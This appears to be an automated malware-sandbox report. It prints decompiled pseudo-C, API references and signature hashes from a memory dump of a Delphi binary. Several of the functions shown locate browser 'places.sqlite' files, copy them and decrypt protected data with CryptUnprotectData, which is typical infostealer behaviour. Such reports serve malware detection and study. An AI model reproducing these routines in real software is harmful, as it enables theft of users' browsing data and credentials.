				_v8 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				E00404150( &_v16);
				_push(_t143);
				_push(0x41328e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t145;
				E00403E14( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x4132b8);
					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x4132b8);
					_t72 =  *0x41b3bc; // 0x41c80c
					_push( *_t72);
					E00403E78();
					if(E0040776C(_v624, 0, 0x104) != 0) {
						_push(_t143);
						_push(0x413202);
						_push( *[fs:eax]);
						 *[fs:eax] = _t145;
						_push(_v8);
						_push(0x4132b8);
						E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
						_push(_v644);
						_push(L"\\places.sqlite");
						E00403E78();
						E0041253C(_v640, 0,  &_v636, _t140, _t141);
						E0040377C( &_v632, _v636);
						_push(_v632);
						_push(_v16);
						_push(0x4132b8);
						_push(_v12);
						_push(E004132E4);
						E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
						_push(_v656);
						_push(L".txt");
						E00403E78();
						E0040377C( &_v648, _v652);
						_pop(_t108);
						E0040E6D4(_t108, 0, _v648, _t140, _t141);
						_pop(_t139);
						 *[fs:eax] = _t139;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t126);
				 *[fs:eax] = _t126;
				_push(E00413295);
				E00403BF4( &_v656, 2);
				E004034E4( &_v648);
				E00403BF4( &_v644, 3);
				E004034E4( &_v632);
				E00403BF4( &_v628, 3);
				return E00403BF4( &_v16, 3);
			}

0x00413030
0x00413030
0x00413031
0x00413033
0x00413039
0x0041303a
0x0041303b
0x0041303e
0x00413044
0x0041304a
0x00413050
0x00413056
0x0041305c
0x00413062
0x00413068
0x0041306e
0x00413074
0x0041307a
0x0041307d
0x00413080
0x00413086
0x0041308e
0x00413096
0x0041309d
0x0041309e
0x004130a3
0x004130a6
0x004130be
0x004130d4
0x004130d7
0x004130d7
0x004130da
0x004130f0
0x004130f5
0x004130fb
0x00413100
0x00413105
0x00413112
0x00413124
0x0041312c
0x0041312d
0x00413132
0x00413135
0x00413138
0x0041313b
0x00413151
0x00413156
0x0041315c
0x0041316c
0x0041317d
0x0041318e
0x00413199
0x0041319a
0x0041319d
0x004131a2
0x004131a5
0x004131bb
0x004131c0
0x004131c6
0x004131d6
0x004131e7
0x004131f2
0x004131f3
0x004131fa
0x004131fd
0x004131fd
0x0041321c
0x00413228
0x0041322f
0x00413232
0x00413235
0x00413245
0x00413250
0x00413260
0x0041326b
0x0041327b
0x0041328d

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,0041328E,?,00000000,?,00000000,?,00413A53,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004130CF
FindNextFileW.KERNEL32(?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413217
FindClose.KERNEL32(?,?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413228

Part of subcall function 0041253C: GetTickCount.KERNEL32 ref: 00412580
Part of subcall function 0041253C: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC

Strings

\*.*, xrefs: 004130B6
.txt, xrefs: 004131C6
\places.sqlite, xrefs: 0041315C

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*$\places.sqlite
API String ID: 3908936366-3919338718
Opcode ID: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
Instruction ID: db2ad4c0925ffecf13339862ae006cc807f871b19183d5a4da560477eb916681
Opcode Fuzzy Hash: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
Instruction Fuzzy Hash: 50512E749042199FCF50EF62CC89ACDBBB9EB48305F5041FAA508B3251DB399F858F18

Uniqueness

Uniqueness Score: -1.00%

Function 00404C71, Relevance: 9.0, APIs: 6, Instructions: 41
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C71(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
				E0041B00C = 2;
				 *0x41c010 = 0x4010b8;
				 *0x41c014 = 0x4010c0;
				 *0x41c036 = 2;
				 *0x41c000 = E004045C4;
				if(E00402A94() != 0) {
					_t3 = E00402AC4();
				}
				E00402B88(_t3);
				 *0x41c03c = 0xd7b0;
				 *0x41c208 = 0xd7b0;
				 *0x41c3d4 = 0xd7b0;
				 *0x41c02c = GetCommandLineA();
				 *0x41c028 = E00401180();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x41c5a8 = E00404BA8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x41c5a8 = E00404BA8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x41c5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x41c020 = _t11;
				return _t11;
			}

0x00404c71
0x00404c76
0x00404c7b
0x00404c7d
0x00404c84
0x00404c8e
0x00404c98
0x00404c9f
0x00404cb0
0x00404cb2
0x00404cb2
0x00404cb7
0x00404cbc
0x00404cc5
0x00404cce
0x00404cdc
0x00404ce6
0x00404cfa
0x00404d33
0x00404cfc
0x00404d0a
0x00404d22
0x00404d0c
0x00404d0c
0x00404d0c
0x00404d0a
0x00404d38
0x00404d3d
0x00404d42

APIs

Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402A99
Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402AA5

GetCommandLineA.KERNEL32 ref: 00404CD7
GetVersion.KERNEL32 ref: 00404CEB
GetVersion.KERNEL32 ref: 00404CFC
GetCurrentThreadId.KERNEL32 ref: 00404D38

Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

GetThreadLocale.KERNEL32 ref: 00404D18

Part of subcall function 00404BA8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
Instruction ID: 1721a3a9195e16165242481212ff4b6f39af3106f899a404dc8ffc4097ba6689
Opcode Fuzzy Hash: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
Instruction Fuzzy Hash: 210152F0881341D9D310BFB29C863893EA0AF89348F51C53FA2407A2F2D77D40448BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041160C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0041160C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				intOrPtr _v640;
				char _v644;
				char _v648;
				intOrPtr _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				intOrPtr* _t89;
				intOrPtr* _t123;
				void* _t135;
				intOrPtr* _t139;
				void* _t151;
				intOrPtr _t155;
				intOrPtr _t171;
				intOrPtr _t178;
				intOrPtr _t198;
				intOrPtr _t199;

				_t196 = __esi;
				_t195 = __edi;
				_t153 = __ebx;
				_t198 = _t199;
				_push(__ecx);
				_t155 = 0x54;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
				} while (_t155 != 0);
				_push(_t155);
				_t1 =  &_v8;
				 *_t1 = _t155;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				E00404150( &_v16);
				_push(_t198);
				_push(0x41195e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				E00403E14( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411988);
					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411988);
					_t89 =  *0x41b180; // 0x41c91c
					_push( *_t89);
					E00403E78();
					if(E0040776C(_v624, _t153, 0x104) != 0) {
						_push(_t198);
						_push(0x41189c);
						_push( *[fs:eax]);
						 *[fs:eax] = _t199;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x411988);
							E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
							_push(_v644);
							_push(0x411988);
							_t139 =  *0x41b180; // 0x41c91c
							_push( *_t139);
							E00403E78();
							E00411034(_v640, _t153,  &_v636, _t195, _t196);
							E0040377C( &_v632, _v636);
							_push(_v632);
							_push(_v16);
							_push(0x411988);
							_push(_v12);
							_push(E00411990);
							E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
							_push(_v656);
							_push(L".txt");
							E00403E78();
							E0040377C( &_v648, _v652);
							_pop(_t151);
							E0040E6D4(_t151, _t153, _v648, _t195, _t196);
						}
						if(_a4 == 0) {
							_push(_v8);
							_push(0x411988);
							E00403D6C( &_v672, 0x104,  &(_v616.cFileName));
							_push(_v672);
							_push(0x411988);
							_t123 =  *0x41b180; // 0x41c91c
							_push( *_t123);
							E00403E78();
							E004112D0(_v668, _t153,  &_v664, _t195, _t196);
							E0040377C( &_v660, _v664);
							_push(_v660);
							_push(_v16);
							_push(0x411988);
							_push(_v12);
							_push(E00411990);
							E00403D6C( &_v684, 0x104,  &(_v616.cFileName));
							_push(_v684);
							_push(E00411990);
							_push(E004119A8);
							_push(E004119A8);
							_push(L".txt");
							E00403E78();
							E0040377C( &_v676, _v680);
							_pop(_t135);
							E0040E6D4(_t135, _t153, _v676, _t195, _t196);
						}
						_pop(_t178);
						 *[fs:eax] = _t178;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t171);
				 *[fs:eax] = _t171;
				_push(E00411968);
				E00403BF4( &_v684, 2);
				E004034E4( &_v676);
				E00403BF4( &_v672, 3);
				E004034E4( &_v660);
				E00403BF4( &_v656, 2);
				E004034E4( &_v648);
				E00403BF4( &_v644, 3);
				E004034E4( &_v632);
				E00403BF4( &_v628, 3);
				return E00403BF4( &_v16, 3);
			}

0x0041160c
0x0041160c
0x0041160c
0x0041160d
0x0041160f
0x00411610
0x00411615
0x00411615
0x00411617
0x00411619
0x00411619
0x0041161c
0x0041161d
0x0041161d
0x00411620
0x00411621
0x00411622
0x00411623
0x00411626
0x00411629
0x0041162f
0x00411637
0x0041163f
0x00411646
0x00411647
0x0041164c
0x0041164f
0x00411667
0x0041167d
0x00411680
0x00411680
0x00411683
0x00411699
0x0041169e
0x004116a4
0x004116a9
0x004116ae
0x004116bb
0x004116cd
0x004116d5
0x004116d6
0x004116db
0x004116de
0x004116e5
0x004116eb
0x004116ee
0x00411704
0x00411709
0x0041170f
0x00411714
0x00411719
0x00411726
0x00411737
0x00411748
0x00411753
0x00411754
0x00411757
0x0041175c
0x0041175f
0x00411775
0x0041177a
0x00411780
0x00411790
0x004117a1
0x004117ac
0x004117ad
0x004117ad
0x004117b6
0x004117bc
0x004117bf
0x004117d5
0x004117da
0x004117e0
0x004117e5
0x004117ea
0x004117f7
0x00411808
0x00411819
0x00411824
0x00411825
0x00411828
0x0041182d
0x00411830
0x00411846
0x0041184b
0x00411851
0x00411856
0x0041185b
0x00411860
0x00411870
0x00411881
0x0041188c
0x0041188d
0x0041188d
0x00411894
0x00411897
0x00411897
0x004118b6
0x004118c2
0x004118c9
0x004118cc
0x004118cf
0x004118df
0x004118ea
0x004118fa
0x00411905
0x00411915
0x00411920
0x00411930
0x0041193b
0x0041194b
0x0041195d

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053,00000000,00000000,00000000,?,00411CBE,00000000,00000000), ref: 00411678

Part of subcall function 004112D0: GetTickCount.KERNEL32 ref: 00411315
Part of subcall function 004112D0: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

FindNextFileW.KERNEL32(?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053), ref: 004118B1
FindClose.KERNEL32(?,?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000), ref: 004118C2

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

.txt, xrefs: 00411780, 00411860
\*.*, xrefs: 0041165F

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
String ID: .txt$\*.*
API String ID: 4269597168-2615687548
Opcode ID: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
Instruction ID: 5d1a81ccab342788691620b24a62b0bf455cea36908fa984f2d283373c0e855c
Opcode Fuzzy Hash: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
Instruction Fuzzy Hash: 40813C7490011DAFCF11EB51CC56BDDB779EF44304F6081EAA218B62A1DB399F858F58

Uniqueness

Uniqueness Score: -1.00%

Function 004119A8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004119A8(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr* _t74;
				intOrPtr* _t99;
				void* _t111;
				void* _t115;
				intOrPtr _t130;
				intOrPtr _t143;
				void* _t147;
				void* _t148;
				intOrPtr _t149;

				_t145 = __esi;
				_t144 = __edi;
				_t115 = __ebx + 1;
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t147 = _t148;
				_t149 = _t148 + 0xfffffd74;
				_push(_t115);
				_push(__esi);
				_push(__edi);
				_v632 = 0;
				_v636 = 0;
				_v648 = 0;
				_v652 = 0;
				_v656 = 0;
				_v640 = 0;
				_v644 = 0;
				_v624 = 0;
				_v628 = 0;
				_v620 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				E00404150( &_v16);
				_push(_t147);
				_push(0x411c11);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403E14( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411c38);
					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411c38);
					_t74 =  *0x41b3bc; // 0x41c80c
					_push( *_t74);
					E00403E78();
					if(E0040776C(_v624, 0, 0x104) != 0) {
						_push(_t147);
						_push(0x411b85);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						_push(_v8);
						_push(0x411c38);
						E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
						_push(_v644);
						_push(0x411c38);
						_t99 =  *0x41b3bc; // 0x41c80c
						_push( *_t99);
						E00403E78();
						E00410D88(_v640, 0,  &_v636, _t144, _t145);
						E0040377C( &_v632, _v636);
						_push(_v632);
						_push(_v16);
						_push(0x411c38);
						_push(_v12);
						_push(E00411C40);
						E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
						_push(_v656);
						_push(L".txt");
						E00403E78();
						E0040377C( &_v648, _v652);
						_pop(_t111);
						E0040E6D4(_t111, 0, _v648, _t144, _t145);
						_pop(_t143);
						 *[fs:eax] = _t143;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t130);
				 *[fs:eax] = _t130;
				_push(E00411C18);
				E00403BF4( &_v656, 2);
				E004034E4( &_v648);
				E00403BF4( &_v644, 3);
				E004034E4( &_v632);
				E00403BF4( &_v628, 3);
				return E00403BF4( &_v16, 3);
			}

0x004119a8
0x004119a8
0x004119a8
0x004119a9
0x004119ab
0x004119ad
0x004119af
0x004119b5
0x004119b6
0x004119b7
0x004119ba
0x004119c0
0x004119c6
0x004119cc
0x004119d2
0x004119d8
0x004119de
0x004119e4
0x004119ea
0x004119f0
0x004119f6
0x004119f9
0x004119fc
0x00411a02
0x00411a0a
0x00411a12
0x00411a19
0x00411a1a
0x00411a1f
0x00411a22
0x00411a3a
0x00411a50
0x00411a53
0x00411a53
0x00411a56
0x00411a6c
0x00411a71
0x00411a77
0x00411a7c
0x00411a81
0x00411a8e
0x00411aa0
0x00411aa8
0x00411aa9
0x00411aae
0x00411ab1
0x00411ab4
0x00411ab7
0x00411acd
0x00411ad2
0x00411ad8
0x00411add
0x00411ae2
0x00411aef
0x00411b00
0x00411b11
0x00411b1c
0x00411b1d
0x00411b20
0x00411b25
0x00411b28
0x00411b3e
0x00411b43
0x00411b49
0x00411b59
0x00411b6a
0x00411b75
0x00411b76
0x00411b7d
0x00411b80
0x00411b80
0x00411b9f
0x00411bab
0x00411bb2
0x00411bb5
0x00411bb8
0x00411bc8
0x00411bd3
0x00411be3
0x00411bee
0x00411bfe
0x00411c10

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB

Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48

Strings

\*.*, xrefs: 00411A32
.txt, xrefs: 00411B49

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*
API String ID: 3908936366-2615687548
Opcode ID: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
Instruction ID: bf64687dc2ad86eb18c2fbcd59d677e1e6eaf9ec35dfa69074ee7f3f85d2a588
Opcode Fuzzy Hash: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
Instruction Fuzzy Hash: 25514B749052199FCF61EF61CD85ACDBBB8EB48304F5081FAA508B32A1DB389F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 004119AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004119AC(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr* _t72;
				intOrPtr* _t97;
				void* _t109;
				intOrPtr _t127;
				intOrPtr _t140;
				void* _t144;
				void* _t145;
				intOrPtr _t146;

				_t142 = __esi;
				_t141 = __edi;
				_t144 = _t145;
				_t146 = _t145 + 0xfffffd74;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v632 = 0;
				_v636 = 0;
				_v648 = 0;
				_v652 = 0;
				_v656 = 0;
				_v640 = 0;
				_v644 = 0;
				_v624 = 0;
				_v628 = 0;
				_v620 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				E00404150( &_v16);
				_push(_t144);
				_push(0x411c11);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				E00403E14( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411c38);
					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411c38);
					_t72 =  *0x41b3bc; // 0x41c80c
					_push( *_t72);
					E00403E78();
					if(E0040776C(_v624, 0, 0x104) != 0) {
						_push(_t144);
						_push(0x411b85);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						_push(_v8);
						_push(0x411c38);
						E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
						_push(_v644);
						_push(0x411c38);
						_t97 =  *0x41b3bc; // 0x41c80c
						_push( *_t97);
						E00403E78();
						E00410D88(_v640, 0,  &_v636, _t141, _t142);
						E0040377C( &_v632, _v636);
						_push(_v632);
						_push(_v16);
						_push(0x411c38);
						_push(_v12);
						_push(E00411C40);
						E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
						_push(_v656);
						_push(L".txt");
						E00403E78();
						E0040377C( &_v648, _v652);
						_pop(_t109);
						E0040E6D4(_t109, 0, _v648, _t141, _t142);
						_pop(_t140);
						 *[fs:eax] = _t140;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(E00411C18);
				E00403BF4( &_v656, 2);
				E004034E4( &_v648);
				E00403BF4( &_v644, 3);
				E004034E4( &_v632);
				E00403BF4( &_v628, 3);
				return E00403BF4( &_v16, 3);
			}

0x004119ac
0x004119ac
0x004119ad
0x004119af
0x004119b5
0x004119b6
0x004119b7
0x004119ba
0x004119c0
0x004119c6
0x004119cc
0x004119d2
0x004119d8
0x004119de
0x004119e4
0x004119ea
0x004119f0
0x004119f6
0x004119f9
0x004119fc
0x00411a02
0x00411a0a
0x00411a12
0x00411a19
0x00411a1a
0x00411a1f
0x00411a22
0x00411a3a
0x00411a50
0x00411a53
0x00411a53
0x00411a56
0x00411a6c
0x00411a71
0x00411a77
0x00411a7c
0x00411a81
0x00411a8e
0x00411aa0
0x00411aa8
0x00411aa9
0x00411aae
0x00411ab1
0x00411ab4
0x00411ab7
0x00411acd
0x00411ad2
0x00411ad8
0x00411add
0x00411ae2
0x00411aef
0x00411b00
0x00411b11
0x00411b1c
0x00411b1d
0x00411b20
0x00411b25
0x00411b28
0x00411b3e
0x00411b43
0x00411b49
0x00411b59
0x00411b6a
0x00411b75
0x00411b76
0x00411b7d
0x00411b80
0x00411b80
0x00411b9f
0x00411bab
0x00411bb2
0x00411bb5
0x00411bb8
0x00411bc8
0x00411bd3
0x00411be3
0x00411bee
0x00411bfe
0x00411c10

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB

Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48

Strings

\*.*, xrefs: 00411A32
.txt, xrefs: 00411B49

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*
API String ID: 3908936366-2615687548
Opcode ID: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
Instruction ID: 460237bab6dc973d40a851033a2d7f34c10cc3b5c211c467e1e524dd2a58d6ff
Opcode Fuzzy Hash: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
Instruction Fuzzy Hash: E9511C749052199FCF61EF61CD89ACDBBB9EB48304F5081FAA508B3261DB389F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A610, Relevance: 3.0, APIs: 2, Instructions: 33
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040A610(intOrPtr __eax, void* __ecx, char __edx) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v36;
				intOrPtr _v40;

				_t19 = __ecx;
				_v20 = __edx;
				_v16 = __eax;
				_push( &_v12);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *0x41ca64() == 0) {
					return E00403538(__ecx, E0040A678);
				}
				E004036DC(__ecx, _v36);
				E00403B1C(_t19, _v40);
				return LocalFree(_v36);
			}

0x0040a614
0x0040a616
0x0040a619
0x0040a621
0x0040a622
0x0040a624
0x0040a626
0x0040a628
0x0040a62a
0x0040a630
0x0040a639
0x00000000
0x0040a664
0x0040a641
0x0040a64c
0x00000000

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A631
LocalFree.KERNEL32(?), ref: 0040A656

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
Instruction ID: 789b43464e992449ae21f91847352ccfea11bbcfb58c617e1741a13a3b8d6e83
Opcode Fuzzy Hash: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
Instruction Fuzzy Hash: 85F0BEB1344300ABD310EE69CC82B4BB7E8AB84700F14893E7698EB2D1D639E955875A

Uniqueness

Uniqueness Score: -1.00%

Function 004606F5, Relevance: 2.8, Strings: 2, Instructions: 285COMMON

Download Yara Rule

Strings

, xrefs: 004609CB
a, xrefs: 004609C0

Memory Dump Source

Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Similarity

API ID:
String ID: $a
API String ID: 0-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: 4fd98cce1c05c289d1c38523d6e74cf079a843006d5b417f1885a5d5d51f159c
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: 36C167716083018FC724CF64C494A2BB7E2FF98704F158A6EE4869B352E775E849CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404BA8, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404BA8(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x404c0e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00403748( &_v20, 7,  &_v15);
				E00402988(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00404C15);
				return E004034E4( &_v20);
			}

0x00404bb1
0x00404bb6
0x00404bb7
0x00404bbc
0x00404bbf
0x00404bce
0x00404bde
0x00404be9
0x00404bf4
0x00404bf4
0x00404bfa
0x00404bfd
0x00404c00
0x00404c0d

APIs

